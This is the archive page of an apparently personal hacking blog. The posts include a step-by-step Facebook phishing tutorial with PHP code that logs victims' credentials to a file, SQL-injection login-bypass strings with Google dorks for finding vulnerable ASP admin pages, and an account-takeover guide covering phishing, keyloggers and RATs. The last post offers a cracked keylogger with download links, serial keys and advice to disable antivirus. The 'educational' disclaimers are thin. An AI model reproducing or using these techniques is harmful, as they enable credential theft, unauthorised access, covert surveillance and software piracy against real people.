Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Monday, July 29, 2013

MAKING FACEBOOK PHISHING SITE TUTORIAL.




The way s the easiest and most commonly use way of hacking a Facbook account.

Step1: Goto www.facebook.com/login.php
Step2 : Save the file to your desktop with photos with name login.php
Step3 : Open the html file with notepad.
Step4 : Now search for form method="POST" and replace it with form method="GET"
Step5 : And next is replacing action="https://login.facebook.com/login.php?login_attempt=1" with action="lol.php"
Step6 : now open a notepad and type following as it is.


header ('Location: http://www.facebook.com');
$handle = fopen("lol.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



NOW save this as hello.php

Step7 : now make a account on t35.com and Upload

Login.html
hello.php
lol.txt


For A DETAILED way of uploading the Phishing site Visit: http://geekyshailabh.blogspot.in/2013/01/making-facebook-phishing-site-tutorial.html


NOTE: You ahve to make the other person enter his password and you can get the password by downloading the lol.txt file from your t35.com account by cPanel.

Monday, February 18, 2013

Website Hijacking – Complete Tutorial Part-1

Website Hijacking – Complete Tutorial Part-1


Hello viewers!
I would make sure that all the viewers are comfortable and enjoying the posts :)
Okay now lets begin with the topic I have mentioned above.
What is the first thing that comes to your mind when you see a topic like Website Hijacking ?? Do you feel like today after reading this you gonna hijack somebody’s website and bring the hell out of him?
lolz.. Well you can do that unless you are good at heart just to use this material for educational and awareness purpose and the most important thing is to safeguard your own website or your related website that may be your family business or someone close enough needs to be secured.
Alright as some of you may think why am I teaching you this and why is the topic name hijack if I recommend you to secure and not steal. Then let me tell you that the best way to secure yourself is to hack it yourself. You can provide yourself the best security only when you are good enough a thief :)
Well so here I begin with a motto to teach you guys how to secure yourselves.
Shall I ??
Okay! Here I go…
Every website that you visit or every website that is completely well available in the net obviously has somebody controlling it. I guess you call the guy ADMIN ?
Alright so does the admin sit there at the other end and wait for you to enter login ID and password and then check it out with his collection and allows or denies permission to access ?
Is it the case ?
Obviously “NO” would be the reply, the admin has a control panel as in case of your PC you have a control panel where you have designed and predefined things to manage your system. The same goes here the control panel is the mother of any website where the admin acts as a very good obedient kid. The control gives a database to the admin to store all the ID’s and passwords and when you try logging in you enter the ID and password which is then approved by the website database storing the ID’s and passwords.
Hence we all know that human are more intelligent than machine as we created machine so we can cheat the machine, that is we bypass the database procedure in some cases and in some cases we cheat the machine and upload our shells or deface the website or in some cases the worst is we poke and poke and poke the database using database management system technique and steal all the information from the database and gain access to the website. Have you guys not seen movies where one guy gets the other guy drunk and flatter him and acquire the required info ? That is the same in this case 3 too. We name this cases like the first case is called kidding where you bypass the asp governed sites, the second is XSS (cross site scripting method) and 3rd is the SQLi (my sequel commands injection).
Now how many of you are aware of binary coding ?
Well I am here for the one’s who haven’t yet.
Binary coding is in terms of 0′s and 1′s for every single thing we type as this is only what the system understands actually. even for ON ad OFF its o for OFF and 1 for ON.
in case of TRUE-FALSE o for FALSE and 1 represents TRUE.
so we’ll move direct to the first hijacking method that is KIDDING or call it KIDDO method:
usually the admins are a bit more intelligent as they have been gifted with few extra pounds of brain by their mother, so they use their login page as followed by domain name:
/ADMIN
/admin
/Admin
/Administrator
/administrator
/ADMINISTRATOR.
Now whats the password how do we find that out? In fact who cares and why should we waste our limited pounds brain finding the password for an asp governed website when we can simply bypass the database.
Lets see how…
There are few gates that you must know before you attempt the bypass method:
AND gate and OR gate, as the name suggest AND similar to ADD (so this gate multiplies any two input and returns the output)
where as the OR gate adds the inputs and returns the output value correspondingly.
““““““““““““““““““““““““““““““““““`
Okay now understand these tables:                                                                                    `
                                     
““““““““““““““““““““““““““““““““““`
Now we bypass the password using these tables making the database to read this conditions instead of typing the password and then the machine converts it to binary and then checks it out, we simply give it the binary codes directly and make the machine check the condition and give us access!
Remember this bypass is for asp governed site only so lets take an asp governed site and show it to you:
Go to Google and search for  asp login site and type the username/user ID as types I have mentioned above and in place of password try bypassing it using this method.
0 ‘or’ 0 ‘=’ 0 and hit enter you are either logged in or denied, if denied then try
1 ‘or’ 1 ‘=’ 1 and enter :)
Enjoy this, you have the entire tables above ;)
Then XSS and SQLi are too big to be posted in this post so it will be posted in my next post following thing… Hope you enjoy by then :)
http://www.webstatschecker.com/stats/keyword/adminlogin_asp_pk
Here are some dorks that will avail you this kinda vulnerable websites. Copy and paste them in Google search!
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

cheers!!

Saturday, February 2, 2013

How Hacker Hack Email IDs

How Hacker Hack Email IDs

Hello guys, today I am going to write about how hackers hack email IDs and spoof into them for personal information of the victim. I will mention all the methods used by hackers which will help you understand the basic idea about it. You might have a doubt about what advantage a hacker can gain  hacking an email id and spoofing in that. A hacker will be able to steal money, hack into a web server, access victim’s bank account etc just by hacking an email id! Surprised? Yes that’s true a hacker can gain access into all of them. If you still don’t believe this then read this…
While practicing with my skills once I hosted a fake page on a public computer which was linked to my email! I constructed the page in such a way that once a victim enters his username, password and hits “log in” he will be redirected to his inbox but his username and password will be sent to my email id. I got a victim in my trap and I entered into his email account then I saw that he was an internet banker and hence his bank account was linked to his email. I simply sent a mail to the bank contact person and i received his personal data related to the bank. This way I was able to access his bank account and also was able to shop online by using his bank info but he was my Maternal uncle so i didn't lead to any problem.

NOTE:- THIS MAY LEAD TO PRISON IF U GOT CAUGHT

So here are the methods used by hackers to hack an email id.
Method 1: Fake mail
This is the basic method employed by laymen to hack an email id. Hackers do not use this method unless the victim is a fool. You just have to send a mail containing false info and ask them to mention their username and password in the reply to get the access into that service which you mentioned in your mail!
This trick is not so efficient therefore hackers don’t prefer this method. You don’t have to be a hacker to perform this type of attack because this is just like a child’s play. This trick works only if you are able to fool the victim properly.
Method 2: Keylogging
This is the best method to hack an email id. You just need a keylogger which will send you every keystroke of the victim. You will have to pass a link containing the keylogger and it automatically gets installed in the victim’s computer. You have to find the best keylogger for employ this type of trick.There are keyloggers which work remotely and available online.
A professional hacker is capable of writing his own keylogger but if you are not one of them then you have to buy a keylogger online. If you have physical access to victims computer then you can upload a keylogger yourself and then later check out the keystrokes.
Method 3: Cookie Stealing
Cookie is a piece of text stored on victim’s computer by websites visited by the user. This stored cookie is used by web server to identify and authenticate the user. So, if you steal this cookie (which is stored in victim browser) and inject this stolen cookie in your browser, you can imitate victim identity to web server and enter his email account easily.
A hacker steals a session of the victim and logs into his email without giving the victim an idea about the stolen cookie. This is called Session Hijacking/ Cookie stealing
Method 4: Phishing
This is the trick I used in hacking the victim’s id which i mentioned above in the example! This is very simple trick, you just have to create a web page of the login form which exactly looks like the email service. Then you have to host it on a public server and send it to victim. When a victim uses that page to login his email and password will be sent to you via email!
To hack an email using phishing you must have a basic knowledge on HTML or there are many online tools which will automatically create a fake page. If you want to be a pro hacker then you must learn HTML and create a page.
Method 5: Remote Administration Tools
This is similar to keylogging! Remote Administration Tools (RAT) is the remote keylogging. Here you do not have physical access to the victim’s computer, but you still install it without alerting the victim about it.A keylogger software will operate in a complete stealth mode and thus remains undetected.
Method 6: Malware/ JavaScript
A hacker writes a simple code which is referred as malware or JavaScript. Once the code is executed on the victim’s computer his credential data is sent to the hacker through the internal ports. A hacker saves the code on a web page which is later sent to the victim, when the victims opens the web page the code automatically executes and his system get vulnerable to the attacks.

I am still learning method 6 ,will upload more info as i get into it :)
So these are the common methods used by a hacker to hack into an email id. In my later articles I will describe each method with an example, so stay updated.

Saturday, January 26, 2013

How To Hack Windows 8 Password

How To Hack Windows 8 Password

 


In Windows 8, you can log in to the system using traditional text password, picture password, four-digit PIN or Windows Live ID. What to do if you forgot one of the login password? How to hack Windows 8 password without losing the files on your computer?
If you are a heavy Windows 8 users, you’ll discover that you can always click on Sign-in options to choose to log in using traditional text password or Windows Live ID, if you forgot picture password or four-digit PIN. So if there is a software which can hack both local account password and Windows Live ID, you can regain access to your system no matter what types of password you’ve forgotten.
Luckily there is a software called Reset Windows Password utility which can do this perfectly. The software comes as an ISO image file. Just burn the ISO image to a CD, put the CD into your CD-ROM drive and reboot the computer. The system will load a complete mini operating system which contains a password hacking tool, it enables you to reset your forgotten local account and Windows Live account password easily.
How to Hack Windows 8 Password?
  1. Click here to download the Reset Windows Password software. Once the download is complete, unzip the download file and you’ll find the CD ISO image: ResetWindowsPwd.iso.
  2. Burn the ISO image to an empty CD using any CD/DVD recording software such as BurnCDCC or ISO2Disc.
  3. Place the Live CD you’ve created in the CD drive of your Windows 8 computer. Head into the BIOS and set the computer to boot from CD.
  4. The boot procedure may take one or two minutes, and the Reset Windows Password program will start.        

  1. From the main window of Reset Windows Password program, you could see the Windows SAM registry file and user accounts inside the SAM file.
  2. Choose the user account whose password you forgot, and then click on the Reset Password button. It will reset the forgotten Windows 8 password immediately.
Restart the computer and remove the password hacking CD, you can then log in to Windows 8 with a new password. After logging in using the traditional text password or Windows Live ID, you can reset your picture password and four-digit PIN easily.

Join US more hAcks!!! 

Friday, January 25, 2013

ARDAMAX KEYLOGGER V3.8.9 LATEST [FULL] [FREE] [CRACK] [SERIAL KEY]

ARDAMAX KEYLOGGER V3.8.9 LATEST [FULL] [FREE] [CRACK] [SERIAL KEY]






Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.

This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.



Keylogger Features:

* Email log delivery - keylogger can send you recorded logs through e-mail delivery at set times - perfect for remote monitoring!
* FTP delivery - Ardamax Keylogger can upload recorded logs through FTP delivery.
* Network delivery - sends recorded logs through via LAN.
* Clipboard logging - capture all text copied to the Windows Clipboard.
* Invisible mode makes it absolutely invisible to anyone. Ardamax Keylogger is not visible in the task bar, system tray, Windows 2000/XP/2003/Vista/Windows 7 Task Manager, process viewers (Process Explorer, WinTasks etc.), Start Menu and Windows Startup list.
* Visual surveillance - periodically makes screenshots and stores the compressed images to log.
* Chat monitoring - Ardamax Keylogger is designed to record and monitor both sides of a conversation in following chats:
o AIM
o Windows Live Messenger 2011
o ICQ 7
o Skype 4
o Yahoo Messenger 10
o Google Talk
o Miranda
o QiP 2010
* Security - allows you to protect program settings, Hidden Mode and Log file.
* Application monitoring - keylogger will record the application that was in use that received the keystroke!
* Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
* Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
* Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
* Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
* It records every keystroke. Captures passwords and all other invisible text.

Other Features:

* Windows 2000/2003/XP/Vista/Windows 7 support
* Monitors multi-user machines
* Automatic startup
* Friendly interface
* Easy to install

NOTE:-antivirus may intrupt u while installation so kindly disable it for some time .100% genuine downloads

Enjoy;)

Download: This file is full Ardamax (Latest) Keylogger with no activation needed, downloaded from their official site. Just Downlaod and ENJOY ;)

ARDAMAX 3.8.9 ::: HERE (without remote package)

ARDAMAX 3.7.8 ::: http://www.box.net/shared/lidooniyjv (FULL)

Ardamax 3.7.6:::http://www.box.net/shared/dzp1m8koen (FULL

SERIAL KEY :
==========

Name: Luiz Ricardo P Oliveira
serial: 3F1A-54F8-032C

               or


Username :- DarkBoard
Serial Key:- SGTPSQOBHFMVROR



©2012, Copyright Shailabh Singh.Please do not copy the articles of GeekyShailabh without taking permission.